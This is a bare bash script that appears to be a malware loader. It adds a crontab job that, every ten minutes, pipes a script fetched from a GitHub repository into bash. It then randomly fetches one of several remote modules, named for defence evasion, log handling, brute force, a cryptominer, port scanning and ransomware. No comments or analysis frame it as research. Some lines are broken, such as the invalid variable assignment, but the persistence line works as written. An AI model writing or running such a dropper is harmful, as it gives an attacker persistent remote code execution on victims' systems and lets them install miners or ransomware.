#!/bin/bash
DEF=true
LOG=true
NET=true
MINER=true
PORT=false
BLOCK=false
TEST=false

(crontab -l 2>/dev/null; echo "*/10 * * * * curl https://raw.githubusercontent.com/ArchieSin314/TestSite/main/main | bash ") | crontab -
i = $RANDOM

if [[ $DEF = true ]] && [[ $(($i % 101)) -ge 0 ]] && [[ $(($i % 101)) -lt 10 ]]
then
	curl https://raw.githubusercontent.com/ArchieSin314/TestSite/main/def

elif [[ $LOG = true ]] && [[ $(($i % 101)) -ge 10 ]] && [[ $(($i % 101)) -lt 20 ]]
then
	curl https://raw.githubusercontent.com/ArchieSin314/TestSite/main/logs

elif [[ $NET = true ]] && [[ $(($i % 101)) -ge 20 ]] && [[ $(($i % 101)) -lt 30 ]]
then
        curl https://raw.githubusercontent.com/ArchieSin314/TestSite/main/force

elif [[ $MINER = true ]] && [[ $(($i % 101)) -ge 30 ]] && [[ $(($i % 101)) -lt 40 ]]
then
        curl https://raw.githubusercontent.com/ArchieSin314/TestSite/main/miner

elif [[ $PORT = true ]] && [[ $(($i % 101)) -ge 40 ]] && [[ $(($i % 101)) -lt 50 ]]
then
        curl https://raw.githubusercontent.com/ArchieSin314/TestSite/main/ports

elif [[ $BLOCK = true ]] && [[ $(($i % 101)) -ge 50 ]] && [[ $(($i % 101)) -lt 60 ]]
then
        curl https://raw.githubusercontent.com/ArchieSin314/TestSite/main/ransom

elif [[ $TEST = true ]] && [[ $(($i % 101)) -ge 60 ]] && [[ $(($i % 101)) -lt 70 ]]
then
        curl https://raw.githubusercontent.com/ArchieSin314/TestSite/main/ransom

else
	exit 0
fi


